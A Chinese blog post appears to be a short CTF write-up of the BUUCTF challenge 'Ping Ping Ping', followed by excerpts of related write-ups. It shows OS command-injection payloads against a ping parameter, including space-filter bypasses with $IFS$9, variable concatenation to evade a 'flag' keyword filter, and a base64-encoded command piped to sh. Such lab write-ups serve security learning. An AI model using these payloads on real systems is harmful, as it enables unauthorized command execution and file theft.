buuctf [GXYCTF2019]Ping Ping Ping

最新推荐文章于 2024-07-09 11:00:18 发布
最新推荐文章于 2024-07-09 11:00:18 发布
阅读量791 收藏
点赞数
分类专栏: 笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/SopRomeo/article/details/104882465
版权

在这里插入图片描述
进去就要我们ping ip ,看看能不能命令执行 ?ip=127.0.01;ls发现可行
看到有flag ,不能cat,可远观而不可亵玩呼!

百度了命令执行绕过方法

试了很久,个人觉得这题有bug

a=ag.php;b=fl;c=cat;$c$b$a

如果把ag.php放后面就不行…


a=cat;b=fl;c=ag.php;$a$b$c

flag在源代码里

penson by 小乌
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
buuctf[GXYCTF2019]Ping Ping Ping
hintll的博客
03-21 5096
buuctf[GXYCTF2019]Ping Ping Ping 这个题目的标题是pingping盲猜是关于命令执行的题目 打开环境后 只有一个/ip=? 应该是提示用get的方式来传参一个地址执行ping的操作 直接ping127.0.0.1 回显ping127.0.0.1的数据 说明是一道命令执行的题目 执行:?ip=127.0.0.1|ls 其中|的作用是命令分隔符 还有相关的符号 ; --在 shell 中,是”连续指令” & --不管第一条命令成功与否,都会执行第二条命令 &
Linux批量pingIP地址
05-17
在Linux系统中,通过shell脚本读取IP列表,进行批量ping操作,并记录结果
CTF题目pingpingpongpong--获取flag
weixin_52937457的博客
03-17 1693
ctf获取flag入门
[GXYCTF2019]Ping Ping Ping 解题纪要
最新发布
qq_37079022的博客
07-09 129
绕过后出现新的报错 flag被拦截那就换个文件 换index.php。能访问 那就存在命令执行加上一个ls 看看都有什么文件。也可以用*替换 如cat fl*.php但是被过滤了。重点2 如何绕过字母使用其他字母赋值 然后用$引用。使用<、<>、$IFS$1 (内部字段分隔符)看到了flag.php cat一下就成功了。ip=那就评一个ip。重点1 linux中空格的过滤如何绕过。字母,无论它们之间有多少其他字符。源码中出现 此行内容将检查。
BUUctf [GXYCTF2019]Ping Ping Ping
qq_61988806的博客
10-28 1238
BUUctf [GXYCTF2019]Ping Ping Ping
BUUCTFPing Ping Ping
金 帛的博客
02-20 6793
BUUCTFWP,关于一些waf的绕过
BUUCTF:[GXYCTF2019]Ping Ping Ping
末初的CSDN博客
10-20 1637
题目地址:https://buuoj.cn/challenges#[GXYCTF2019]Ping%20Ping%20Ping ?ip=明显存在命令执行注入,使用;或者|闭合上一条命令 经过fuzz测试,过滤了空格、bash字符、flag字符、以及一些特殊符号 空格绕过这里使用$IFS$9 /?ip=;id;whoami;pwd;ls;ls$IFS$9-lha 我做题时用的是 /?ip=;cat$IFS$9`ls` 直接将当前目录下所有文件全部cat出来,查看源码发现flag 题.
BUUCTF【Web】Ping Ping Ping
qq_70434663的博客
03-02 797
首先使用ls命令查看当前路径下有那些文件,拼接符有“&”、“|”、“||”、“&&”、“;进入靶场后是一个ping的功能(命令执行漏洞),参数ip传递的内容会被当做ip地址进行网络连通性测试。绕过空格后发现过滤了flag(绕过flag),所以使用反引号``(高优先级特性)查看flag.php。绕过后我们并没有发现flag,那是因为注释的内容不会直接显示在页面中,右键查看源码就可以获取flag。接下来直接访问flag.php文件,直接访问PHP发现空格过滤了(绕过空格),所以我们使用$IFS$9来绕过空格。
LabVIEW实现网络Ping IP测试
07-10
在这个“LabVIEW实现网络Ping IP测试”的项目中,我们可以通过LabVIEW编写程序来模拟操作系统中的ping命令,对指定的IP地址进行连通性检测。 **一、LabVIEW基础知识** 1. **图形化编程**:LabVIEW采用G语言...
Ping命令实现的扩充
09-27
实验内容:Ping命令实现的扩充,在给定的Ping程序的基础上做如下功能扩充: ? -h 显示帮助信息 ? -b 允许ping一个广播地址,只用于IPv4 ? -t 设置ttl值,只用于IPv4 ? -q 安静模式。不显示每个收到的包的分析结果,...
批量PingTelnet检测
12-25
批量Ping和Telnet检测是网络管理员常用的两种网络连通性检查工具,它们在IT领域中扮演着重要角色,尤其在大型网络环境中。批量检测能够大大提高工作效率,帮助快速定位网络问题。 **批量Ping检测** 批量Ping检测是...
Labview ping IP.vi
01-07
通过程序来ping设备的IP地址,这样就可以确认当前设备是否已经正确连接到电脑。在连接设备之前可以判断
BUUCTF [GXYCTF2019]Ping Ping Ping 1
m0_62879498的博客
03-11 5811
[GXYCTF2019]Ping Ping Ping 1 在本题我们考察的是命令执行 已进入本关,我们发现他在询问 ?ip 我们先尝试输入 ?ip=127.0.0.1 发现访问成功 查询一下它的目录: ?ip=127.0.0.1|ls 发现有两个文件夹flag.php,index.php,发现 flag 我们尝试访问 flag。 ?ip=127.0.0.1|cat flag.php 点击查询, 很明显我们需要进行一个空格的过滤 空格过滤常见绕过注释: < > %20(spac
buuctf-Ping Ping Ping
xixihahawuwu的博客
11-23 782
看着界面,是一道命令执行题 构造payload Ls查询下 空格被过滤了 $IFSKaTeX parse error: Expected 'EOF', got '#' at position 67: …23162235934.png#̲pic_center) Fla…IFS1Y2F0IGZsYWcucGhw∣base641Y2F0IGZsYWcucGhw|base641Y2F0IGZsYWcucGhw∣base64IFS$1-d|sh ...
BUUCTF WEB [GXYCTF2019]Ping Ping Ping
Y1da的博客
04-10 1489
BUUCTF WEB [GXYCTF2019]Ping Ping Ping 进入题目后根据提示提交?ip=127.0.0.1尝试 回显PING 127.0.0.1 (127.0.0.1): 56 data bytes 判断存在命令执行漏洞,尝试提交?ip=127.0.0.1;ls 回显 PING 127.0.0.1 (127.0.0.1): 56 data bytes flag.php index.php 尝试访问index.php?ip=127.0.0.1;cat index.php 回显f
BUUCTF-Web:[GXYCTF2019]Ping Ping Ping
m0_56161093的博客
04-26 2118
题目 解题过程 1、题目页面提示?ip=,猜测是让我们把这个当做变量上传参数,由此猜想是命令注入 2、用管道符加上linux常用命令ls(windwos可以尝试dir)试试 所谓管道符(linux)的解释与用法如下: 尝试命令: ?ip=127.0.0.1;ls 看到flag.php,那就使用cat flag.php命令尝试读取 ?ip=127.0.0.1;cat flag.php 被过滤了空格,过滤空格的方法如下: $IFS ${IFS} $IFS$1 //$1改成$加其他数字貌似都行 &l
BUUCTF WEB [GXYCTF2019]Ping Ping Ping1
guishengyx的博客
10-19 185
直接试试传参ip 他确实去ping了 昨天也碰到过一个差不多的题目 所以试一下linux的指令 ?ip=192.168.1.1;ls 成功了 果然是linux 尝试打开flag.php 看提示应该是过滤了空格 上百度找到了几种代替空格的方法 %20(space)、%09(tab)、$IFS$9、${IFS}$9、 {IFS}、IFS 测试发现括号也被过滤了 所以使用$IFS$9代替空格 继续打开flag.php 还是失败了 试试打开index.php c...
[GXYCTF2019]Ping Ping Ping
qq_42404383的博客
09-03 465
[GXYCTF2019]Ping Ping Ping 题目: 引入眼帘的是一片空白,只有/?id= 看到/?ip=、随便构造一个payload 分析: 考点是远程命令执行?继续尝试改造payload 老老实实走常规路线,查看目录文件,找到flag.php 无法直接cat flag.php 解题: 考绕过的知识点? 命令执行漏洞利用及绕过方式总结 空格过滤 paload ==> ?ip=1;cat$IFS$1index.php 成功访问、给了提示、bash、flag、和一些字符被过滤
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值